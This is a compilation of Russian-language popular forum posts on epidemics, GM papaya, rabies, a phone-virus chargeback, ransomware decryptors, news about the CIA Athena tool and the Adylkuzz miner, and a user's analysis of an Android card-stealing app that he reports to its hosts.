«В целом в случае эпидемий нужно внимательно следить за информацией и рекомендациями специалистов, избегать путей заражения и не поддаваться панике. Не следует пытаться накупить лекарств и наестся ими для профилактики. Главная опасность – это стать одним из первых пациентов, пока вспышка еще не установлена. В этом случае вам не смогут оказать помощь или смогут но слишком поздно. По этому нужно постоянно руководствоваться санитарными нормами и здравым смыслом. Могу привести пример возникновения двух эпидемий холеры. Одна была еще в Российской Империи. Там один паломник привез из религиозного паломничества бутылку воды и вылил в колодец в своей деревне в Астраханской области. Последствия были самые ужасающие, началась пандемия холеры. Второй случай произошел в Дагестане в 90-е годы двадцатого века. Там очень уважаемый человек заболел холерой так же во время религиозного паломничества. Умер от неё по приезду, а на его похороны съехались люди со всего Дагестана, а так же из некоторых районов Чечни и Ингушетии. На похоронах многие заразились и развезли инфекцию по другим населенным пунктам. Из-за того что инкубационный период холеры довольно долгий полыхнуло сильно и сразу везде. Мне не довелось, но многие мои старшие коллеги участвовали в ликвидации это заболевания.
В связи с этим хочется особо отметить – любые массовые скопления людей, сопряженные с нарушениями санитарных норм (пусть и обусловленные обычаями и обрядами, религией и так далее) всегда несут большой риск.»

Добавлю еще немного от себя – следует очень внимательно относится к своему здоровью и здоровью своих близких. Особенно к непонятным симптомам и необычным обстоятельствам. Если после возвращения из Индии или Вьетнама у вас неожиданно поднялась температура - это не повод пить парацетамол – это повод обратится к врачу и подробно изложить все факты. Пусть это звучит глупо, но это может реально спасти жизнь вам и вашим близким.

Данный материал представляет собой текстовую версию эфира на интернет-радиостанции Лампа ФМ от 29.09.2017
4156

Как генная инженерия папайю спасла

Развернуть
Хотелось бы рассказать об важном достижении этой технологии, которое почему-то слабо освещается в интернете и вообще в СМИ.

Это - папайя. Слева - взрослое растение, справа - плод.
Как генная инженерия папайю спасла
Для нас, в общем-то, это экзотический фрукт, не представляющий особой ценности. Однако для развивающихся (и не только) стран это довольно-таки важная съедобная культура. В принципе, её можно сравнить с картофелем.

В 20 веке случилась одна неприятная ситуация (на самом деле их было больше, но с папайей - одна). В 1937 году на Гавайях появился вирус кольцевой пятнистости папайи. Вирус возник где-то 2 тысячи лет назад, предположительно в Индии.
Добравшись до штата с красивыми вулканами, вирус начал поражать плантации этой культуры. Ниже представлены заражённые деревья и плоды:
Как генная инженерия папайю спасла
Ну, обычная ситуация. У растения есть вредители. Фермерам худо-бедно удавалось сдерживать распространение вируса до 50-х годов 20-го столетия. А потом вирус слетел с катушек и начал невероятную кампанию по уничтожению вида. Образовался чрезвычайно патогенный штамм (разновидность), который выкашивал плантацию за плантацией. Возбудителя по островам разносила тля. Через 12 лет после появления столь агрессивного вида, количество земли, годное для выращивания папайи, сократилось на 94%
Надо сказать, что выращивание этого фрукта важно для Гавайев. Поэтому фермеры быстренько стали перемещать свои деревья на один из островов штата, Пуна. Он остался нетронутым вирусом. Дошло до того, что этот остров стал производить 95% всей гавайской папайи к 1970-ым годам.
Как генная инженерия папайю спасла
Разумеется, были предприняты попытки искоренить вирус. Помимо карантина предлагались использовать изолирующие сетки (чтобы тля не попадала на деревья), уничтожение переносчиков (то есть тли), попытки создания устойчивого сорта с помощью селекции. Все способы потерпели неудачу. Вирус продолжал свою экспансию.
К середине 90-х годов патоген добрался до Пуны, в результате чего производство папайи упало в 2 раза.
Ежегодно из-за заражения Гавайский архипелаг терял до 11 млн долларов.

Казалось бы, проигранная война. Но у людей было ещё одно средство. Хуже уже точно не будет, так что было решено немножко изменить папайное ДНК.
Выяснилось, что если в цепочку ДНК растения добавить ген (кусочек цепочки поменьше) от вируса, то папайя не заразится. Ген, отвечающий за выработку белка оболочки вируса, был внедрён в ДНК эмбриональных клеток папайи, в результате чего он не давал нормально работать генам вируса, препятствуя воспроизведению новых вирусных копий (антисмысловые РНК, хотя есть мнение, что механизм подавления вируса связан с РНК-интерференцией). Чем больше вирусных генов запихнуть в ДНК дерева, тем к большим штаммам вируса будет резистентность.
Разработка трансгенного сорта началась в 1985 году (то есть ранее, чем вирус уничтожил плантации на Пуне). Сорта под названиями SunUp и Rainbow продемонстрировали впечатляющий результат, показав полный иммунитет к вирусу.
Сравнение трансгенного сорта (Rainbow) с обычным (Sunrise):
Как генная инженерия папайю спасла
Обратите внимание, менее чем за год сорт Sunrise полностью оказался инфицированным.

Получив необходимые процедуры по одобрению от контролирующих организаций (FDA, EPA и др), в мае 1998 года трансгенная папайя началась выращиваться для коммерческого использования. Внедрение генно-модифицированного фрукта в Гавайи позволило в короткие сроки вернуть исходные объемы производства.

В ходе проверок (это нужно для получения лицензии на коммерческое выращивание) не было выявлено никакого негативного влияния на организм человека. К тому же, человек всегда употреблял папайю вместе с её вирусом, так как там, где она растёт, всегда присутствует этот патоген.
Ещё одно интересное свойство трансгеных сортов - они останавливают распространение вируса, что позволяет выращивать обычную, нетрансгенную культуру.
Несмотря на то, что сорт SunUp обладает более мощной защитой (в плане наличия резистентности к бо'льшиму числу штаммов), на Гавайях преобладает сорт Rainbow. Выращивается ГМ-папайя не только там, но и в других странах (Индия, Бразилия etc)

Папайя стала первым растением, которому было добавлена устойчивость к вирусам с помощью генной инженерии.

Пруфы и статьи с подробным описанием:
http://www.apsnet.org/publications/apsnetfeatures/Pages/papa... (статья от авторов трансгенных сортов)
https://www.ncbi.nlm.nih.gov/pubmed/17172756
https://www.ncbi.nlm.nih.gov/pubmed/15012507
https://www.ncbi.nlm.nih.gov/pubmed/18705869
https://en.wikipedia.org/wiki/Papaya_ringspot_virus
148

Телефонные вирусы. Как вернуть деньги.

Развернуть

Вероятно, на сайте был какой-то эксплоит, рассчитанный на старые андроиды, в общем, на телефон автоматом установилось приложение, которое грохнуло доступ к настройкам, смс-кам и плеймаркету. Сразу позвонили в банк, чтобы заблокировали карту, но около 1500 рублей утекли. Техподдержка сказала, что вернуть деньги не может, обращайтесь в полицию, которая, как всем известно, вряд ли поможет в возврате денег.

Телефон из безопасного режима реанимировали, вирус грохнули, в ЛК сотового оператора поотрубали подписки и глянули логи детализации. Смс-ка шла на номер bee900, то есть на мобильный банк (нафига он нужен в эпоху приложений?). В общем, деньги ушли таким простым образом, и отрубить эту фичу вроде как нельзя без отрубания вообще входящих смс-ок об операциях, но не суть.

Однако способ вернуть бабло есть, просто о нём мало кто знает. Он называется чарджбэк. Желательно как можно быстрее дотопать до банка и написать заявление на операцию отката этой транзакции. Откаты можно совершать не только транзакций из-за вирусной атаки, но и "левый" paypass (когда с терминалом прислоняются к вашей сумке в метро) или даже из-за некачественного оказания услуги. В различных ситуациях банк может пытаться ставить палки в колёса и не принимать такие заявления, но по закону он это делать обязан, так что боритесь или на крайний случай обращайтесь в другое отделение. Но у нас всё приняли с первого раза, и сегодня те самые 1500 рублей вернулись обратно на карту.

Резюмируя: если вы стали жертвой вирусов, мошенничества от кардеров и прочих неприятных списаний с карты, которые вы не совершали, пользуйтесь чарджбэком. Ну, и обновите андроид, а также старайтесь не открывать левые смс-ки и ссылки, хотя закон подлости с случайными нажатиями никто не отменял.
2843

Бешенство. Или чем может закончится знакомство с енотовидной собакой.

Развернуть
В приемное отделение больницы доставлен мужчина. Он тревожен, дергается, эмоционально возбужден. Говорит с трудом. Из опроса пациента стало ясно, что он не может пить воду, содрогается от дуновения ветра, вспышек света и громких звуков, периодически возникают слуховые и звуковые галлюцинации. Замечено чрезмерное слюноотделение. При попытке дать пациенту воду наступает спазм глотательной мускулатуры. Со слов мужчины 3 недели назад на дачном участке был укушен диким енотом. Больного госпитализировали. На следующий день состояние больного ухудшилось судороги усилились, теперь могли возникать и при обычном прикосновении к пациенту и сопровождались кратковременной остановкой дыхания, стал бредить. Еще через несколько дней приступы возбуждения и водобоязни прекратились больной стал неподвижен, покрыт весь крупными каплями пота, пришел в себе снова может есть и пить, говорит, что стало легче дышать, настроение больного улучшилось, появилась надежда на выздоровление, однако стала нарастать тахикардия, нарушилось мочеотделение, температура тела выросла до 42 ° С. Ночью пациент скончался от остановки сердца. Данные симптомы характеры для такого страшного заболевание как бешенство.  
Бешенство. Или чем может закончится знакомство с енотовидной собакой.
По сути животные являются своего рода "смертниками", забирая с собой на тот свет как можно больше укушенных
Бешенство- враг лесников, охотников, работников питомников и просто любителей зверушек. Бешенство является вирусной инфекцией, которая передается через укусы и слюну плотоядных животных. Бешеной собаке необязательно выгрызать кусок мяса до кости, чтобы заразить бешенством, достаточно обслюнявить ту часть тела на которой есть какая-то ранка (прямо как заражение зомби-вирусом в каком-либо голливудском фильме). Помимо этого, есть еще один «интересный» способ подхватить вирус бешенства. В пещерах, в которых обитает большое количество зараженных летучих мышей, у которых, в результате поражения вирусом, может быть чрезмерное выделение слюны с вирусом, можно подцепить вирус просто сделав довольно глубокий вдох (т.к. слюна с возбудителем будет в состоянии аэрозоля в воздухе) (ХОТЯ ЭТОТ ВИД ЗАРАЖЕНИЯ ОЧЕНЬ СПОРНЫЙ МНОГИЕ СПЕЦИАЛИСТЫ ЕГО НЕ ПРИЗНАЮТ).
Бешенство. Или чем может закончится знакомство с енотовидной собакой.
Даже сама форма вируса намекает на его опасность.
После укуса вирус размножается и персистирует в месте внедрения, а затем попадает в нервные окончания. Вирус способен избирательно связываться с ацетилхолиновыми рецепторами, что и объясняет его избирательность в отношении нейронов и легкость перемещения в сторону ЦНС. По нервным цепочкам вирус достигает сначала спинного мозга (особенно "любит" поясничный отдел), а затем и головного, где фиксируется и размножается в нейронах продолговатого мозга. В местах поражения вирусом развивается отек, кровоизлияния, дегенеративные изменения нейронов, а также их гибель.  Поражение высших вегетативных центров в гипоталамусе, подкорковых областях, в продолговатом мозге с повышением их возбудимости обусловливает судорожные сокращения дыхательных и глотательных мышц, чрезмерное слюноотделение, повышенную потливость, расстройства сердечно– сосудистой системы и дыхательной деятельности, характерные для данного заболевания. Поражение спинного мозга вызывает гиперрефлексию и параличи. Из центральной нервной системы вирус попадает в различные органы: почки, легкие, печень, а также в слюнные железы и со слюной выделяется во внешнюю среду.
Бешенство. Или чем может закончится знакомство с енотовидной собакой.
Схема путешествия вируса по организму
Гистологически выявляют воспалительный процесс в нервах, узлах тройничного нерва, межпозвонковых и шейных симпатических узлах, сером веществе головного мозга. Характерные цитоплазматические включения - тельца Бабеша-Негри. Считают, что это реактивные продукты пораженных клеток или колонии вирусных частиц.
Бешенство. Или чем может закончится знакомство с енотовидной собакой.
Инкубационный период заболевания у человека длиться от 7 до 100 дней (зависит от многих причин: места попадания вируса в организм (по некоторым данным вирус может передвигаться в сторону ЦНС со скоростью до 3мм/час), состояния иммунной системы и т.д.). В развитии заболевания выделяют три стадии. Первой стадией является стадия предвестников она заключается в появлении неприятных ощущений в области укуса (жжение, зуд, боли), хотя рана уже начала заживать. Больной становится замкнут, апатичен, отказывается от еды, плохо спит, сон у него сопровождается устрашающими сновидениями. Затем присоединяются апатия и депрессия сменяются беспокойством, учащаются пульс и дыхание, возникает чувство стеснения в груди. Следующей наступает стадия возбуждения, для нее характерно развитие повышенной чувствительности к воде, воздуху, свету. У человека при попытке пить возникают судорожные сокращения мышц глотки и гортани, дыхание становится шумным с короткими судорожными вдохами, также возможны эпизоды кратковременной остановки дыхания.Эти явления нарастают в своей интенсивности так, что одно напоминание о воде или звук льющейся жидкости вызывает спазмы мышц глотки и гортани. Дыхание становится шумным в виде коротких судорожных вдохов. В это время резко обостряются реакции на любые раздражители. Приступ судорог может быть спровоцирован дуновением в лицо струи воздуха (аэрофобия), ярким светом (фотофобия) или громким звуком (акустикофобия). Зрачки больного сильно расширены, возникает экзофтальм, взгляд устремляется в одну точку. Пульс резко ускорен, появляется обильное мучительное слюнотечение (сиалорея), потоотделение. На высоте приступа возникает бурное психомоторное возбуждение (приступы буйства, бешенства) с яростными и агрессивными действиями. Больные могут ударить, укусить окружающих, плюются, рвут на себе одежду. Сознание помрачается, развиваются слуховые и зрительные галлюцинации устрашающего характера. Возможна остановка сердца и дыхания. В межприступный промежуток сознание обычно проясняется, больные могут правильно оценивать обстановку и разумно отвечать на вопросы. Через 2-3 дня возбуждение, если не наступила смерть на высоте одного из приступов наступает паралитическая стадия, которая характеризуется параличами мышц конечностей, языка, лица. Далее наступает паралитическая стадия, она характеризуется психическим успокоением. Исчезают страх, тревожное тоскливое настроение, прекращаются приступы гидро– и аэрофобии. Повышается температура тела. В конце нарушается сознание, возникают судороги. Смерть наступает через 12—20 ч после появления паралича дыхания или остановки сердца. Само заболевание в среднем длится неделю.
Бешенство. Или чем может закончится знакомство с енотовидной собакой.
Больной с явной симптоматикой
Способов лечения развившегося бешенства нет, есть лишь возможность его предотвратить развитие заболевания введением вакцин от бешенства на этапе путешествия вируса по нейронам в сторону ЦНС. Прогноз при заболевании плохой, летальность почти 100%. Разрабатывается способ лечения путем введения в искусственную кому ("протокол Милуоки"), хотя сам метод оказывается малоэффективным. Поэтому если вас укусила бродячая собака или милый енотик из соседнего леса, лучше лишний раз не рисковать, а обратится в травмпункт за проведением вакцинации.
Спасибо за внимание!
1560

Дешифровщик .jaff, .wlu и .sVn (вирус Jaff)

Развернуть
Jaff шифрует файлы и добавляет расширения  .jaff, .wlu и .sVn, требует выкуп 1,79 биткоина, то есть порядка $4000.

Через диспетчер задач вырубаем процесс вируса. Как правило произвольное имя процесса. Для примера было SKM_C224e9930.exe
Дешифровщик .jaff, .wlu и .sVn (вирус Jaff)
Качаем декриптор с сайта каспера http://media.kaspersky.com/utilities/VirusUtilities/EN/rakhn...

Утилита предложит выбрать зашифрованный файл с расширением .jaff, .wlu или .sVn, далее попросит выбрать текстовый файл с требованием выкупа.
Дешифровщик .jaff, .wlu и .sVn (вирус Jaff)
Дешифровщик .jaff, .wlu и .sVn (вирус Jaff)
Утилита просканирует весь компьютер и расшифрует файлы (может занять длительное время).
По завершении сканирования будет такая картина:
Дешифровщик .jaff, .wlu и .sVn (вирус Jaff)
Печаль в том что вместе с расшифрованными файлами останутся их зашифрованные копии.
Дополнительная инфа https://www.bleepingcomputer.com/news/security/decrypted-kas...

Ранее о дешифровщиках: http://pikabu.ru/story/spisok_dekriptorov_faylov_posle_zaraz...
1536

WikiLeaks опубликовал эксплоит ЦРУ для всех версий Windows

Развернуть
WikiLeaks опубликовал эксплоит ЦРУ для всех версий Windows
В конце прошлой недели портал WikiLeaks традиционно опубликовал очередную порцию хакерских инструментов ЦРУ. На этот раз активисты обнародовали эксплоит для Windows под названием Athena. Инструмент предназначен для взлома абсолютно любой версии ОС от Microsoft, начиная от Windows XP и заканчивая Windows 10, и позволяет получить контроль над атакуемой системой.
Athena способен загружать на компьютер жертвы вредоносное ПО для выполнения определенных задач, а также добавлять/ извлекать файлы в/из определенных директорий на атакуемой системе. Злоумышленник может менять настройки во время выполнения программы в зависимости от поставленной задачи. Таким образом, с помощью эксплоита ЦРУ могло получить контроль над каким угодно компьютером под управлением Windows и добыть любые сведения.

Athena был создан в августе 2015 года – спустя всего один месяц после выхода Windows 10. Разработчиком инструмента является не сама спецслужба, а американская компания Siege Technologies. Производитель позиционирует себя как ИБ-компанию, специализирующуюся на разработке «технологий для наступательных действий в кибервойне».

С самого начала проект Athena создавался с целью обхода антивирусных решений (в документах ЦРУ упоминается ряд популярных продуктов, неспособных заблокировать эксплоит). Инструмент компрометирует службу dnscache. На Windows 7 и 8 сервис запускается по умолчанию в процессе netsvcs, а на Windows 8.1 и 10 запускается как NetworkService.

Было ли выпущено исправление для эксплуатируемой Athena уязвимости, неизвестно. Microsoft и ЦРУ пока никак не прокомментировали публикацию WikiLeaks.

Учетная запись NetworkService – предопределенная локальная учетная запись с минимальными привилегиями на локальном компьютере, действующая как компьютер в сети. Запускающаяся в контексте NetworkService служба представляет мандат компьютера как удаленного сервера.

Служба dnscache – служба DNS-клиента, кэширующая имена DNS и регистрирующая полное имя компьютера.

Процесс netsvcs (Svchost.exe) – процесс, содержащий другие отдельные службы, используемые Windows для выполнения различных функций.

Источник: http://www.securitylab.ru/news/486209.php
553

Пока WannaCry запугивает пользователей с не обновленной системой, Adylkuzz незаметно пользуется уязвимостью.

Развернуть
За громкой атакой вируса WannaCry, который использовал уязвимости Windows, чтобы внедряться в компьютеры, шифровать файлы и требовать от пользователей выкуп в биткоинах, почти незамеченной прошла другая напасть. Малозаметная программа внедрена через уязвимость того же типа в сотни тысяч машин по всему миру и потихоньку делает деньги для своих создателей. За счёт ваших мощностей и трафика.
Пока WannaCry запугивает пользователей с не обновленной системой, Adylkuzz незаметно пользуется уязвимостью.
О программе Adylkuzz, которая без лишнего шума внедряется в компьютеры по всему миру, используя уязвимости Windows, пишет Mashable, ссылаясь на специалистов компании Proofpoint. Если вирус WanaCrypt0r, известный также под именем WannaCry, наделал много шума, блокировав работу десятков и, возможно, даже сотен тысяч компьютеров в 150 странах, в том числе банкоматов, серверов в больницах, полиции, компаниях связи и транспорта, то Adykluzz действует по-другому. Он никак не даёт знать о себе, если не следить за нагрузкой процессора или видеокарты, потому что не требует выкуп и не наносит вреда файлам, а просто понемногу «майнит» криптовалюту Monero, а затем отправляет её на адреса, связанные с возможными авторами вируса. Специалисты из Proofpoint обнаружили несколько таких адресов, которые агрегируют Monero на разные суммы от 7 до 22 тысяч долларов. Один Monero стоит сейчас около 25 долларов.

По оценкам Proofpoint, заражены уже сотни тысяч компьютеров с устаревшими версиями Windows, на которых отключены обновления, и с пиратскими копиями, причём пользователи по большей части ничего не знают о своих проблемах. Атака Adylkuzz началась за несколько недель до атаки WannaCry. Создатели Adykluzz использовали те же самые хакерские разработки из Агентства национальной безопасности США, утёкшие в сеть, что и авторы WannaCry. Но в отличие от последних, почти ничего не заработавших на своей атаке, могут получить существенную прибыль.
3091

Дешифровщиков Вам в ленту (WannaCry, Wana Decrypt0r, WCry, WannaCrypt0r и WannaCrypt)

Развернуть
Дешифровщиков Вам в ленту (WannaCry, Wana Decrypt0r, WCry, WannaCrypt0r и WannaCrypt)
Дешифровщик WannaKey под Windows XP от Adrien Guinet: https://github'com/aguinet/wannakey
Подтверждение экспертов: https://www.wired.com/2017/05/wannacry-flaw-help-windows-xp-...
Дешифровщиков Вам в ленту (WannaCry, Wana Decrypt0r, WCry, WannaCrypt0r и WannaCrypt)
Дешифровщик wanakiwi под Windows XP,  Windows 7 x86, 2003, Vista, Server 2008 и 2008 R2: https://github'com/gentilkiwi/wanakiwi/releases
Технические детали работы wanakiwi: https://blog.comae.io/wannacry-decrypting-files-with-wanakiw...
Подтверждение эффективности работы wanakiwi специалистами Европола: https://twitter.com/Europol/status/865604532419543041?ref_sr...
ПыСы: Дешифровщики не у всех срабатывают...
1171

Вирус.

Развернуть
Вирус.
2847

Интернет отключили всего на один день

Развернуть
Интернет отключили всего на один день
4382

Небольшое расследование на тему вирусов для Android

Развернуть
Астрологи объявили неделю вирусов, да и просто так совпало, что мне пришел очередной спам такого содержания:
Небольшое расследование на тему вирусов для Android
Разумеется при переходе по ссылке показывается нечто типа "Ваш флеш не фреш! Срочно обновите, а то не покажем MMS". MMS. В 2017 году. Ну да ладно, открываем ссылочку с компа, автоматом закачивается файлик mms.apk. Открывать с телефона мы его конечно же не будем [Дружко.jpg].
Наверное многие знают, что apk-файл - это простой zip архив, который можно распаковать и посмотреть файлики внутри. Ну чтож, для начала сделаем это. Внутри много всего, в том числе есть картиночки.
Небольшое расследование на тему вирусов для Android
Судя по картинкам эта "mms'ка" что-то делает под видом маркета с картами. Возможно даже показывает сиськи, т.к. они имеются, правда в разрешении 48х48 пикселей. Дальнейший просмотр указывает на то, что после установки приложение говорит "Ошибка установки 24" и якобы больше ничего. Но это не так. Внутри apk есть скомпилированный под dalvik файл -  classes.dex, в котором должно быть самое интересное. Гуглим "dex decompiler online", первому же сайту скармливаем apk и получаем архив с исходным кодом. Разве что без коментариев.
Небольшое расследование на тему вирусов для Android
И таки да, оно под видом Play Market запрашивает данные карты:
Небольшое расследование на тему вирусов для Android
Но ведь оно должно их куда-то отправлять. Начинаем ковыряться в джаве. Внутри находим валидатор данных карты. А попутно находим класс обратной связи. Т.е. оно не только данные карты ворует, но и умеет принимать команды и как-то на них реагировать. Собственно названия классов отлично говорят о функционале:
Небольшое расследование на тему вирусов для Android
А вот и управляющий сервер:
Небольшое расследование на тему вирусов для Android
Ну а тут видно как "бот" регистрируется на управляющем сайте:
Небольшое расследование на тему вирусов для Android
Внутри оказывается ещё довольно много интересного. Особенно интересно, что данный вирус/бот общается на русском с управляющим сервером. Внутри сообщения все на русском и расчитан он ра русскоязычных пользователей. Вообщем суть преступления ясна. Начинаем наказание. Вооружившись whois-сервисом смотрим кто владелец подсети откуда качается apk-файл и куда писать абузу?
Небольшое расследование на тему вирусов для Android
Аналогичным способом смотрим владельцев управляющего сервера:
Небольшое расследование на тему вирусов для Android
Пишем письма на оба ящика. Описываем ситуацию, прикладываем скриншоты и ждём...
За пару часов оба хостера отписались "Спасибо за содействие, сайт/учётка заблокированы".

P.S: Оба хостера из Питера, что наводит на мысли о том, что автор вируса/бота от туда же. Ну или это просто совпадение.